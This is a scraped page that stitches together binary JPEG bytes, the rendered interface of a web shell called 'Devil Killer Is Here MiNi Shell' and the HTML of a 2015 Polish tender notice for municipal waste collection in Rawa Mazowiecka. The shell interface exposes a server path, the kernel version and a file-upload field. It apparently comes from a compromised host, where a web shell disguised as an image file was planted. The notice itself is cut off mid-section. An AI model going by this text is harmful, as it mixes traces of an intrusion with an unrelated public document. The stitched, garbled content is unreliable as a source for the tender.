JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151106/300224-N-2015.html

<p class="kh_header"><b>Rawa Mazowiecka: Odbiór odpadów komunalnych od właścicieli
nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie
Gminy Miasto Rawa Mazowiecka</b><br>
<b>Numer ogłoszenia: 300224 - 2015; data zamieszczenia: 06.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Rawa Mazowiecka , pl. Piłsudskiego 5, 96-200 Rawa Mazowiecka, woj. łódzkie, tel. 046 8144201, faks 046 8142628.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawamazowiecka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór odpadów komunalnych od właścicieli
nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie
Gminy Miasto Rawa Mazowiecka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór wskazanych w opisie zamówienia odpadów komunalnych z nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie miasta Rawa Mazowiecka, w sposób zgodny z przepisami ustawy z 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2013 r. poz. 1399 z późn. zm.) oraz przepisami Regulaminu utrzymania czystości i porządku na terenie miasta Rawa Mazowiecka, a także innymi przepisami ustawowymi oraz miejscowymi.. Zakres prac obejmuje: 2.1.1. Odbieranie odpadów z nieruchomości, zamieszkałych przez mieszkańców, w tym: a) odpadów komunalnych niesegregowanych (zmieszanych), b) odpadów segregowanych, c) odpadów ulegających biodegradacji, d) odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego, e) odpadów typu gruz oraz pochodzących z drobnego remontu. Wykonawca odbierze z nieruchomości, na której zamieszkują mieszkańcy, każdą ilość wystawionych odpadów komunalnych zgromadzonych w pojemnikach, workach, a także innych odpadów pozostawionych w miejscu załadunku przez mieszkańców tych nieruchomości. 2.1.2. Odbieranie odpadów z wykorzystaniem mobilnego punktu selektywnej zbiórki odpadów komunalnych zorganizowanym przez Wykonawcę, pochodzących z gospodarstw domowych (z zastrzeżeniem dwukrotnej w ciągu roku zbiórki poprzez wystawienie odpadów przed teren nieruchomości): a) Odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego, b) Zużytych opon, metali, c) Odbieranie odpadów typu przeterminowane i zbędne leki z dotychczas funkcjonujących punktów stacjonarnych zlokalizowanych w następujących w aptekach: ul. K. Wielkiego 3b - Panaceum, Słowackiego 68- Nad Rawką, ul. Krakowska 9 - Verbena, ul. Polna 2b :Apteka Arka Mirosław Puczko, al. Konstytucji 3 Maja 2 - Apteka Św. Stanisława Rawa Mazowiecka -Centrum - z zastrzeżeniem że liczba punktów stacjonarnych może ulec zmianie w czasie realizacji umowy (nie więcej niż o 2 punkty ).2.2. Odbieranie odpadów z zabudowy jednorodzinnej. Na terenie zabudowy jednorodzinnej obowiązywać będzie system mieszany pojemnikowo - workowy zbiórki odpadów komunalnych: 2.2.1. Niesegregowane odpady komunalne (kod odpadu 20 03 01): a) Niesegregowane odpady komunalne odbierane będą z pojemników o pojemności 120 l lub 240 l od właścicieli nieruchomości, na których zamieszkują mieszkańcy - pojemniki zostaną zgodnie z zapotrzebowaniem dostarczone przez firmę świadczącą usługi w zakresie odbioru odpadów komunalnych. b) Częstotliwość odbioru zmieszanych odpadów komunalnych 6 - 1 raz w tygodniu, zgodnie z harmonogramem wykonanym przez Wykonawcę, uzgodnionym z Zamawiającym i przez niego zaakceptowanym. c) Ilość pojemników potrzebnych do zabezpieczenia odbioru odpadów zmieszanych od mieszkańców miasta Rawa Mazowiecka podano w 3 części pkt. 3.1. niniejszego SIWZ. d) Nieodebranie przez Wykonawcę z nieruchomości odpadów zgodnie z harmonogramem - skutkuje obowiązkiem dokonania takiego odbioru najpóźniej w przeciągu 24 godzin od otrzymania reklamacji faksem lub e-mailem od Zamawiającego. e) Wykonawca zobowiązany jest do dostarczenia pojemników na zmieszane odpady komunalne (120l lub 240l ) oraz worków na zlecenie Zamawiającego nie dłużej niż w przeciągu 3 dni roboczych od dnia zgłoszenia zapotrzebowania na pojemnik przez Właściciela nieruchomości. f) Obowiązkiem Wykonawcy będzie uprzątnięcie miejsca wokół wystawionych pojemników, gdy zajdzie taka potrzeba. Wykonawca zabierze dostawione przy pojemnikach worki ze zmieszanymi odpadami komunalnymi. Właściciele nieruchomości mają możliwość dostawienia worków z odpadami w przypadku gdy pojemność pojemnika w danym miesiącu będzie niewystarczająca. g) Obowiązkiem Wykonawcy będzie przetransportowanie zebranych zmieszanych odpadów komunalnych z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK. 2.2.2. Selektywnie zebrane odpady komunalne (odpady segregowane), w tym odpady opakowaniowe (kody 15 01 01, 15 01 02, 15 01 04, 15 01 05, 15 01 06, 15 01 07, 20 01 01, 20 01 02, 20 01 39, 20 01 40): a) Odbiór selektywnie zebranych odpadów komunalnych na terenie zabudowy jednorodzinnej będzie się odbywać w systemie workowym. Wprowadza się następujące rodzaje worków: - zielony- odpady ze szkła; - niebieski- odpady z makulatury, papieru; - żółty- odpady z tworzyw sztucznych oraz drobny złom.b) Worki do odbioru od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych zapewnia Wykonawca. Worki powinny charakteryzować się następującymi parametrami: - materiał - folia polietylenowa LDPE, półprzezroczysta, o grubości zapewniającej wytrzymałość worków, tj. co najmniej 60 mikronów; - kolorystyka i pojemność: żółty - 120 l, niebieski - 120 l, zielony - 60 l; - oznakowanie - worki muszą być opatrzone nadrukiem, na jaki rodzaj odpadu są przeznaczone oraz co można do nich wrzucać oraz co nie powinno być tam wrzucone. Dodatkowo na workach muszą widnieć adres i dane kontaktowe Zamawiającego oraz Wykonawcy. c) Worki służące do segregacji odpadów komunalnych, Wykonawca jest zobowiązany dostarczyć na wskazane przez Zamawiającego nieruchomości najpóźniej tydzień przed pierwszym odbiorem odpadów zebranych w sposób selektywny. d) Częstotliwość wywozu worków do odbioru selektywnie zebranych odpadów komunalnych od właścicieli nieruchomości odbędzie się 1 raz na dwa tygodnie, zgodnie z harmonogramem sporządzonym przez Wykonawcę, po uzgodnieniu i zaakceptowaniu przez Zamawiającego najpóźniej tydzień przed wprowadzeniem nowego harmonogramu. e) Obowiązkiem Wykonawcy jest dostarczenie na własny koszt właścicielom nieruchomości w zabudowie jednorodzinnej worków do selektywnego zbierania odpadów komunalnych na: papier, szkło, plastik i metal po każdorazowym odbiorze, poprzez pozostawianie przy wejściu na nieruchomość nowych pustych worków w dniu odbioru selektywnie zebranych odpadów komunalnych, w ilości odpowiadającej liczbie odebranych worków, f) Realizacja reklamacji- nieodebranie z nieruchomości worków zgodnie z harmonogramem oraz nieprzekazanie worków na wymianę- skutkuje obowiązkiem Wykonawcy, by najpóźniej w przeciągu 24 godzin od otrzymania zawiadomienia faksem lub e-mailem od Zamawiającego usługę będącą przedmiotem zgłoszenia wykonać. Załatwienie reklamacji należy niezwłocznie potwierdzić faksem lub e-mailem, po wykonaniu usługi. Jeżeli Wykonawca nie zrealizuje reklamacji w terminie 24 godzin to zapłaci Zamawiającemu karę o której mowa w §5 ust.1 pkt.3 umowy będącej integralną częścią niniejszej specyfikacji. g) Obowiązkiem Wykonawcy będzie przetransportowanie zebranych odpadów komunalnych z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK. 2.2.3. Odpady komunalne ulegające biodegradacji (kod 15 01 03, 20 01 08, 20 01 38, 20 02 01). a) Odbiór odpadów ulegających biodegradacji na terenie zabudowy jednorodzinnej będzie się odbywać w systemie workowym. b) Worki do odbioru odpadów ulegających biodegradacji właściciele nieruchomości zapewniają na danych nieruchomościach we własnym zakresie. c) Częstotliwość wywozu worków do odbioru odpadów ulegających biodegradacji: - w okresie od 1 kwietnia do 30 września- co tydzień, - w okresie od 1 października do 31 marca- co dwa tygodnie. d) Odbiór worków do odbioru odpadów ulegających biodegradacji odbywać się będzie zgodnie z harmonogramem wykonanym przez Wykonawcę, uzgodnionym z Zamawiającym i przez niego zaakceptowanym najpóźniej tydzień przed wprowadzeniem harmonogramu. e) Obowiązkiem Wykonawcy będzie przetransportowanie zebranych odpadów ulegających biodegradacji z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK. 2.2.1.Odpady wielkogabarytowe (kod 20 03 07) i zużyty sprzęt elektryczny i elektroniczny (kody 20 01 23, 20 01 35, 20 01 36). a) Odbiór odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego odbywać się będzie bezpośrednio sprzed posesji właścicieli nieruchomości, na których zamieszkują mieszkańcy. b) Częstotliwość odbioru odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego -odbywać się będzie w następującym terminie (2016r- kwiecień, 2016r- grudzień), zgodnie z harmonogramem wykonanym przez Wykonawcę, uzgodnionym z Zamawiającym i przez niego zaakceptowanym. c) Obowiązkiem Wykonawcy będzie przetransportowanie zebranych odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK. 2.2.5. Odpady typu gruz oraz pochodzących z drobnego remontu. a) Odbiór odpadów typu gruz oraz pochodzących z drobnego remontu będzie odbywać sie w systemie workowym. b) Worki do odbioru odpadów typu gruz oraz pochodzących z drobnego remontu zapewni Wykonawca, który dostarczy mieszkańcom potrzebne worki zgodnie ze złożonym zmówieniem przez właściciela nieruchomości. c) Wykonawca dostarczy mieszkańcom worki (2 szt na rok. na nieruchomość ) w terminie do 24 godziny od daty zgłoszenia takiego zapotrzebowania. d) Odbiór worków z odpadami typu gruz oraz pochodzącymi z drobnego remontu  odbywać się będzie na podstawie zgłoszenia do Wykonawcy zapotrzebowania na taki odbiór. e) Obowiązkiem Wykonawcy będzie przetransportowanie zebranych odpadów typu gruz oraz pochodzących z drobnego remontu z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK. 2.3. Odbieranie odpadów z zabudowy wielorodzinnej powyżej 7 lokali. 2.3.1. Niesegregowane odpady komunalne (kod odpadu 20 03 01). a) Niesegregowane odpady komunalne odbierane będą z pojemników o pojemności 1100l od właścicieli nieruchomości, na których zamieszkują mieszkańcy. Odpowiednią ilość pojemników zapewnia Wykonawca oraz utrzymuje je w odpowiednim stanie sanitarnym, porządkowym i technicznym. Ilość pojemników potrzebnych do zabezpieczenia odbioru odpadów zmieszanych podano w pkt 3 niniejszego SIWZ. b) Częstotliwość odbioru ww. odpadów dwa razy w tygodniu, w dniach uzgodnionych przez Wykonawcę z zarządcami budynków, zgodnie z harmonogramem wykonanym przez Wykonawcę w uzgodnieniu i po akceptacji przez Zamawiającego. c) Bieżące utrzymywanie czystości i porządku wokół pojemników. d) Obowiązkiem Wykonawcy będzie przetransportowanie zebranych zmieszanych odpadów komunalnych z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK. 2.3.2. Selektywnie zebrane odpady komunalne (odpady segregowane), w tym odpady opakowaniowe (kody 15 01 01, 15 01 02, 15 01 04, 15 01 05, 15 01 06, 15 01 07, 20 01 01, 20 01 02, 20 01 39, 20 01 40). a) Odbiór selektywnie zebranych odpadów na terenie zabudowy wielorodzinnej prowadzony będzie w systemie pojemnikowym o pojemności od 1500l do 2000l, z zachowaniem następującej kolorystyki, dopuszcza się ustawienie pojemników siatkowych ( na plastik oraz szkło) z odpowiednim oznakowaniem: - pojemnik w kolorze żółtym z napisem plastik do odpadów z tworzyw sztucznych, - pojemnik w kolorze niebieskim z napisem papier do odpadów z papieru i tektury - pojemnik w kolorze zielonym z napisem szkło do odpadów ze szkła. b) Obowiązkiem Wykonawcy będzie monitorowanie i opróżnianie wyżej wymienionych pojemników z częstotliwością gwarantującą niezaleganie odpadów przy pojemnikach, nie rzadziej jednak niż raz w tygodniu - wywóz ww. odpadów odbywać się będzie zgodnie z harmonogramem sporządzonym przez Wykonawcę i uzgodnionym przez Wykonawcę z zarządcami budynków. Harmonogram podlegać będzie akceptacji Zamawiającego, c) Wykonawca zobowiązuje się utrzymywać czystości i porządek wokół rozstawionych pojemników. d) Obowiązkiem Wykonawcy będzie przetransportowanie selektywnie zebranych odpadów komunalnych z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK. 2.3.3. Odpady ulegające biodegradacji (kod 15 01 03, 20 01 08, 20 01 38, 20 02 01). a) Odbiór odpadów ulegających biodegradacji na terenie zabudowy wielorodzinnej odbywać się będzie z terenu bezpośrednio przylegającego do altanki śmietnikowej. b) Obowiązkiem Wykonawcy będzie monitorowanie i opróżnianie wyżej wymienionych pojemników z częstotliwością gwarantującą niezaleganie odpadów przy pojemnikach, nie rzadziej jednak niż cztery razy w miesiącu - wywóz ww. odpadów odbywać się będzie zgodnie z harmonogramem sporządzonym przez Wykonawcę i uzgodnionym przez Wykonawcę z zarządcami budynków. Harmonogram podlegać będzie akceptacji Zamawiającego. c) Obowiązkiem Wykonawcy będzie przetransportowanie zebranych odpadów ulegających biodegradacji z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK. 2.3.4. Odpady wielkogabarytowe (kod 20 03 07) i zużyty sprzęt elektryczny i elektroniczny (kody 20 01 23, 20 01 35, 20 01 36). a) Odbiór odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego odbywać się będzie z miejsc wyznaczonych przez zarządców budynków (na przykład przy pojemnikach, altankach śmietnikowych itp.). b) Częstotliwość odbioru odpadów wielkogabarytowych i zużytego sprzętu elektrycznego i elektronicznego - raz na tydzień zgodnie z harmonogramem wykonanym przez Wykonawcę i uzgodnionym przez Wykonawcę z zarządcami budynków. Harmonogram będzie podlegał akceptacji Zamawiającego. c) Obowiązkiem Wykonawcy będzie przetransportowanie zebranych odpadów wielkogabarytowych, zużytego sprzętu elektrycznego i elektronicznego z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK. 2.3.5. Odbieranie odpadów takich jak przeterminowane i zbędne leki (kod 20 01 32, 20 01 31, 20 01 21).b) Odbieranie odpadów typu przeterminowane i zbędne leki z dotychczas funkcjonujących punktów stacjonarnych zlokalizowanych w następujących w aptekach: ul. K. Wielkiego 3b - Panaceum, Słowackiego 68 - Nad Rawką, ul. Krakowska 9 - Verbena, ul. Polna 2b :Apteka Arka - Mirosław Puczko, al. Konstytucji 3 Maja 2 - Apteka Św. Stanisława Rawa Mazowiecka -Centrum - z zastrzeżeniem że liczba punktów stacjonarnych może ulec zmianie w czasie realizacji umowy (nie więcej niż o 2 punkty ); c) W czasie realizacji umowy Wykonawca zapewni odpowiednią ilość wkładów kartonowo foliowych wymienianych każdorazowo przy odbiorze ww. odpadów. d) Częstotliwość odbioru odpadów typu przeterminowane i zbędne leki - raz na 2 miesiące, zgodnie z harmonogramem wykonanym przez Wykonawcę, uzgodnionym i zaakceptowanym przez Wykonawcę z Zamawiającym.e) Obowiązkiem Wykonawcy będzie przekazanie odebranych odpadów typu przeterminowane i zbędne leki poprzez przekazanie ich do unieszkodliwienia zgodnie z przepisami obowiązującego prawa oraz przedstawienie Zamawiającemu, w miesiącach następujących po miesiącach dokonania zbiórki, Zamawiającemu dowodów potwierdzających wykonanie tych czynności. 2.3.6. Odbieranie odpadów typu gruz oraz pochodzących z drobnego remontu. a) Odbiór odpadów typu gruz oraz pochodzących z drobnego remontu będzie odbywać się w systemie workowym. b) Worki do odbioru odpadów typu gruz oraz pochodzących z drobnego remontu zapewni Wykonawca i dostarczy do właściela nieruchomości na jego wniosek. c) Wykonawca dostarczy mieszkańcom worki (2szt na rok. na nieruchomość ) w terminie do 24 godziny od daty zgłoszenia takiego zapotrzebowania. d) Odbiór worków z odpadami typu gruz oraz pochodzącymi z drobnego remontu  odbywać się będzie na podstawie zgłoszenia do Wykonawcy zapotrzebowania na taki odbiór. e) Obowiązkiem Wykonawcy będzie przetransportowanie zebranych odpadów typu gruz oraz pochodzących z drobnego remontu z terenu Gminy Miasto Rawa Mazowiecka do Zakładu Gospodarki Odpadami Aquarium Sp. z o.o. w Pukininie, który zgodnie z obowiązującym prawem na podstawie Uchwały Sejmiku Województwa Łódzkiego Nr XXXV-687-13 z dnia 26.04.2013r otrzymał status Regionalnej Instalacji Przetwarzania Odpadów Komunalnych -RIPOK..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium w wysokości 10.000,00 (słownie: dziesięć tysięcy złotych). 2. Wadium należy wnieść w jednej lub kilku następujących formach (art45. ustawy z dnia 29 stycznia 2004r Pzp (Dz. U. z 2013 r. poz. 907 j.t.): pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. poz. 275 z późn. zm.).3. Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Zamawiającego: Urzędu Miasta Rawa Mazowiecka w Banku Spółdzielczym Biała Rawska nr 87 9291 0001 0054 2395 2000 0040 podając w tytule przelewu: Wadium- przetarg na Odbiór odpadów komunalnych od właścicieli nieruchomości, na których zamieszkują mieszkańcy, położonych na terenie Gminy Miasto Rawa Mazowiecka. Wadium można również wnieść w pieniądzu w kasie Urzędu Miasta Rawa Mazowiecka, Plac Piłsudskiego 4, 96-200 Rawa Mazowiecka w pokoju nr 3. Kopię dowodu wpłaty lub przelewu wadium na konto Zamawiającego należy dołączyć do oferty przetargowej. 4. W przypadku wnoszenia wadium  przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data i godzina uznania ww. konta Zamawiającego. Wadium należy wnieść przed terminem składania ofert. 5. Dokumenty, o których mowa w art. 45 ust. 6 pkt 2 - 5 ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych, muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu wystąpienia zdarzeń, o których mowa w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych, przy czym: 5.1. W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, dokumenty te muszą obejmować swym zakresem wszelkie roszczenia Zamawiającego z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań każdego z nich. 5.2. Dokumenty te będą zawierały klauzule zapłaty sumy wadialnej na rzecz zamawiającego bezwarunkowo i na pierwsze żądanie. 5.3. Dokumenty te zostaną złożone w oryginale.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
